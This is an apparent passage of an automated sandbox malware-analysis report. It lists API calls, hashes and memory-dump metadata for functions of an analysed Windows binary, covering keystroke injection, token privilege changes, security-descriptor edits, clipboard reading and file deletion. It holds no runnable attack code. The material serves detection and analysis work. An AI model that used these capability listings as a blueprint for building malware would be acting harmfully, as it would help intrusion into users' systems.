                                                        • Opcode ID: 92a6bc8267c68cc0a577cc1a23e3c91f0e2f7a086b83f4c4545caf45cb5a94ba
                                                        • Instruction ID: 7c606d0edd55ed72f9e54d376863f09923d350f867870fb87f99d556d6a348eb
                                                        • Opcode Fuzzy Hash: 92a6bc8267c68cc0a577cc1a23e3c91f0e2f7a086b83f4c4545caf45cb5a94ba
                                                        • Instruction Fuzzy Hash: 07C09236280304AFF6149B86BC4AF117764A38DB04F148012F70DB99E3C3F3282AEB61

                                                        Non-executed Functions

                                                        Function 00E89576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8961A
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8965B
                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E8969F
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E896C9
                                                        • SendMessageW.USER32 ref: 00E896F2
                                                        • GetKeyState.USER32(00000011), ref: 00E8978B
                                                        • GetKeyState.USER32(00000009), ref: 00E89798
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E897AE
                                                        • GetKeyState.USER32(00000010), ref: 00E897B8
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E897E9
                                                        • SendMessageW.USER32 ref: 00E89810
                                                        • SendMessageW.USER32(?,00001030,?,00E87E95), ref: 00E89918
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8992E
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E89941
                                                        • SetCapture.USER32(?), ref: 00E8994A
                                                        • ClientToScreen.USER32(?,?), ref: 00E899AF
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E899BC
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E899D6
                                                        • ReleaseCapture.USER32 ref: 00E899E1
                                                        • GetCursorPos.USER32(?), ref: 00E89A19
                                                        • ScreenToClient.USER32(?,?), ref: 00E89A26
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E89A80
                                                        • SendMessageW.USER32 ref: 00E89AAE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E89AEB
                                                        • SendMessageW.USER32 ref: 00E89B1A
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E89B3B
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E89B4A
                                                        • GetCursorPos.USER32(?), ref: 00E89B68
                                                        • ScreenToClient.USER32(?,?), ref: 00E89B75
                                                        • GetParent.USER32(?), ref: 00E89B93
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E89BFA
                                                        • SendMessageW.USER32 ref: 00E89C2B
                                                        • ClientToScreen.USER32(?,?), ref: 00E89C84
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E89CB4
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E89CDE
                                                        • SendMessageW.USER32 ref: 00E89D01
                                                        • ClientToScreen.USER32(?,?), ref: 00E89D4E
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E89D82
                                                          • Part of subcall function 00E09944: GetWindowLongW.USER32(?,000000EB), ref: 00E09952
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E89E05
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                        • String ID: @GUI_DRAGID$F$p#
                                                        • API String ID: 3429851547-638943876
                                                        • Opcode ID: 05f874e88c38bf402162cb54e852238fc9f0c9e5f2e90b5445c3156708618f7c
                                                        • Instruction ID: a06ecc2f9ef81253c4caac93ffa0b9b80b8ac3276751f75728a9077a64a8cb90
                                                        • Opcode Fuzzy Hash: 05f874e88c38bf402162cb54e852238fc9f0c9e5f2e90b5445c3156708618f7c
                                                        • Instruction Fuzzy Hash: 6642BF30A04200AFD725EF24CC44EBABBE5FF89714F181619F69DA72A2E731D854DB52
                                                        Function 00E0F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00E0F998
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E4F474
                                                        • IsIconic.USER32(00000000), ref: 00E4F47D
                                                        • ShowWindow.USER32(00000000,00000009), ref: 00E4F48A
                                                        • SetForegroundWindow.USER32(00000000), ref: 00E4F494
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E4F4AA
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E4F4B1
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E4F4BD
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E4F4CE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E4F4D6
                                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00E4F4DE
                                                        • SetForegroundWindow.USER32(00000000), ref: 00E4F4E1
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4F4F6
                                                        • keybd_event.USER32(00000012,00000000), ref: 00E4F501
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4F50B
                                                        • keybd_event.USER32(00000012,00000000), ref: 00E4F510
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4F519
                                                        • keybd_event.USER32(00000012,00000000), ref: 00E4F51E
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4F528
                                                        • keybd_event.USER32(00000012,00000000), ref: 00E4F52D
                                                        • SetForegroundWindow.USER32(00000000), ref: 00E4F530
                                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00E4F557
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 83ec99739cc5d682acd7cea9478382ebf10913ef8f3b1369c29b930e7807d7e9
                                                        • Instruction ID: ce710d517fdea881eee5123408ce5ffd47b98cf1e4fd7d3a256c00c08278a34c
                                                        • Opcode Fuzzy Hash: 83ec99739cc5d682acd7cea9478382ebf10913ef8f3b1369c29b930e7807d7e9
                                                        • Instruction Fuzzy Hash: 1C314F71A40218BEEB206BB65C4AFBF7E6CEB45F50F201066F605F61D1D6B15D00AB70
                                                        Function 00E51201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5170D
                                                          • Part of subcall function 00E516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E5173A
                                                          • Part of subcall function 00E516C3: GetLastError.KERNEL32 ref: 00E5174A
                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E51286
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E512A8
                                                        • CloseHandle.KERNEL32(?), ref: 00E512B9
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E512D1
                                                        • GetProcessWindowStation.USER32 ref: 00E512EA
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00E512F4
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E51310
                                                          • Part of subcall function 00E510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E511FC), ref: 00E510D4
                                                          • Part of subcall function 00E510BF: CloseHandle.KERNEL32(?,?,00E511FC), ref: 00E510E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                        • String ID: $default$winsta0$Z
                                                        • API String ID: 22674027-1808616255
                                                        • Opcode ID: 8b9ea875e1d12eb457e72f2112d07cec37c82727d51a15a1db030c093200140b
                                                        • Instruction ID: 7da63fbc3d751bc0860a8241c52cd73f6f05421e9d1f8f446bce61a84ce8699e
                                                        • Opcode Fuzzy Hash: 8b9ea875e1d12eb457e72f2112d07cec37c82727d51a15a1db030c093200140b
                                                        • Instruction Fuzzy Hash: A181CE71900209AFDF208FA4DC49FEE7BB9EF09709F1465A9FD24B61A0D7758948CB20
                                                        Function 00E50B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E51114
                                                          • Part of subcall function 00E510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E51120
                                                          • Part of subcall function 00E510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E5112F
                                                          • Part of subcall function 00E510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E51136
                                                          • Part of subcall function 00E510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5114D
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E50BCC
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E50C00
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E50C17
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E50C51
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E50C6D
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E50C84
                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E50C8C
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E50C93
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E50CB4
                                                        • CopySid.ADVAPI32(00000000), ref: 00E50CBB
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E50CEA
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E50D0C
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E50D1E
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E50D45
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50D4C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E50D55
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50D5C
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E50D65
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50D6C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E50D78
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50D7F
                                                          • Part of subcall function 00E51193: GetProcessHeap.KERNEL32(00000008,00E50BB1,?,00000000,?,00E50BB1,?), ref: 00E511A1
                                                          • Part of subcall function 00E51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E50BB1,?), ref: 00E511A8
                                                          • Part of subcall function 00E51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E50BB1,?), ref: 00E511B7
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 4175595110-0
                                                        • Opcode ID: 77ef6ccf5045ad41e3ea99db712fbcf56286734bda350acd3ed378a30e9c6677
                                                        • Instruction ID: 2ad0abd73789ac1610a6878c779e770a076939e80303a6dbda4aab50a72b48bb
                                                        • Opcode Fuzzy Hash: 77ef6ccf5045ad41e3ea99db712fbcf56286734bda350acd3ed378a30e9c6677
                                                        • Instruction Fuzzy Hash: 4A71687290020AAFDF10DFE5DC88BEEBBB8AF05345F144915FD18B6191D771AA49CB60
                                                        Function 00E6EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32(00E8CC08), ref: 00E6EB29
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E6EB37
                                                        • GetClipboardData.USER32(0000000D), ref: 00E6EB43
                                                        • CloseClipboard.USER32 ref: 00E6EB4F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E6EB87
                                                        • CloseClipboard.USER32 ref: 00E6EB91
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E6EBBC
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00E6EBC9
                                                        • GetClipboardData.USER32(00000001), ref: 00E6EBD1
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E6EBE2
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E6EC22
                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00E6EC38
                                                        • GetClipboardData.USER32(0000000F), ref: 00E6EC44
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E6EC55
                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E6EC77
                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E6EC94
                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E6ECD2
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E6ECF3
                                                        • CountClipboardFormats.USER32 ref: 00E6ED14
                                                        • CloseClipboard.USER32 ref: 00E6ED59
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                        • String ID:
                                                        • API String ID: 420908878-0
                                                        • Opcode ID: b3d9f6fd3b0b28a78bcab28757c0ac93d2dd3bf2dc2c5495b4d45ab4132e71a2
                                                        • Instruction ID: 3e3b6e151bcb388fca190626adf56333024dbfcb78e35dc2346d7e909d2a6ca2
                                                        • Opcode Fuzzy Hash: b3d9f6fd3b0b28a78bcab28757c0ac93d2dd3bf2dc2c5495b4d45ab4132e71a2
                                                        • Instruction Fuzzy Hash: 7A61EF382442019FD310EF25E884F7AB7E4EF85798F249419F55AA72E2DB31D909CB72
                                                        Function 00E6698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E669BE
                                                        • FindClose.KERNEL32(00000000), ref: 00E66A12
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E66A4E
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E66A75
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E66AB2
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E66ADF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                        • API String ID: 3830820486-3289030164
                                                        • Opcode ID: b217efa3f6de21c56986d340bd830faf083097343c8da274b32db7948e6e163e
                                                        • Instruction ID: 79e214a2a2e89c48b2b228ba1534db23049cac8ed593c9fa34c6abd39986de83
                                                        • Opcode Fuzzy Hash: b217efa3f6de21c56986d340bd830faf083097343c8da274b32db7948e6e163e
                                                        • Instruction Fuzzy Hash: 0CD15071508304AEC710EBA4D991EBBB7ECEF98704F04891DF689D6191EB74DA44CB72
                                                        Function 00E69642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00E69663
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00E696A1
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00E696BB
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E696D3
                                                        • FindClose.KERNEL32(00000000), ref: 00E696DE
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00E696FA
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6974A
                                                        • SetCurrentDirectoryW.KERNEL32(00EB6B7C), ref: 00E69768
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E69772
                                                        • FindClose.KERNEL32(00000000), ref: 00E6977F
                                                        • FindClose.KERNEL32(00000000), ref: 00E6978F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1409584000-438819550
                                                        • Opcode ID: a35db1b9bd0669f5eeebdd270c6b516ba16b72eb40db5d73a9217327e1e08aef
                                                        • Instruction ID: 0931f9ee1feb57a48841cfa4d6159c414128519dfa886e06b6af30e96c7453e9
                                                        • Opcode Fuzzy Hash: a35db1b9bd0669f5eeebdd270c6b516ba16b72eb40db5d73a9217327e1e08aef
                                                        • Instruction Fuzzy Hash: F831D532580619AEDF14AFB5EC48AEE77BC9F4A364F105166F909F20A1DB34DD44CB20
                                                        Function 00E6979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00E697BE
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E69819
                                                        • FindClose.KERNEL32(00000000), ref: 00E69824
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00E69840
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E69890
                                                        • SetCurrentDirectoryW.KERNEL32(00EB6B7C), ref: 00E698AE
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E698B8
                                                        • FindClose.KERNEL32(00000000), ref: 00E698C5
                                                        • FindClose.KERNEL32(00000000), ref: 00E698D5
                                                          • Part of subcall function 00E5DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E5DB00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 2640511053-438819550
                                                        • Opcode ID: abf9e2e62e011ac13db46186327f4d8f015c1afdb8ba3b5303b1c42253daad7a
                                                        • Instruction ID: 914dfec3fa1329c60da9f0c5100d3d9f406b6a17cf63cd71ac97619d4db6d891
                                                        • Opcode Fuzzy Hash: abf9e2e62e011ac13db46186327f4d8f015c1afdb8ba3b5303b1c42253daad7a
                                                        • Instruction Fuzzy Hash: DE31C332580619AEDB14AFB5EC48ADE77BC9F4A364F205156E914B30E2DB30D989CB60
                                                        Function 00E5D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF3A97,?,?,00DF2E7F,?,?,?,00000000), ref: 00DF3AC2
                                                          • Part of subcall function 00E5E199: GetFileAttributesW.KERNEL32(?,00E5CF95), ref: 00E5E19A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E5D122
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E5D1DD
                                                        • MoveFileW.KERNEL32(?,?), ref: 00E5D1F0
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E5D20D
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E5D237
                                                          • Part of subcall function 00E5D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E5D21C,?,?), ref: 00E5D2B2
                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 00E5D253
                                                        • FindClose.KERNEL32(00000000), ref: 00E5D264
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 1946585618-1173974218
                                                        • Opcode ID: edacddaa847d761a98457ff5a2ada39ee79cc8e98bf9650f25eaa0c46a162301
                                                        • Instruction ID: e30c301906f243608ff8304f335cc4040fc388db4eb1642e9bec92573dfa1f96
                                                        • Opcode Fuzzy Hash: edacddaa847d761a98457ff5a2ada39ee79cc8e98bf9650f25eaa0c46a162301
                                                        • Instruction Fuzzy Hash: AD61773180510DAACF15EBA0CE929FDB7B5AF15305F218465E906B71A1EB30AF0DCB70
                                                        Function 00E6ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
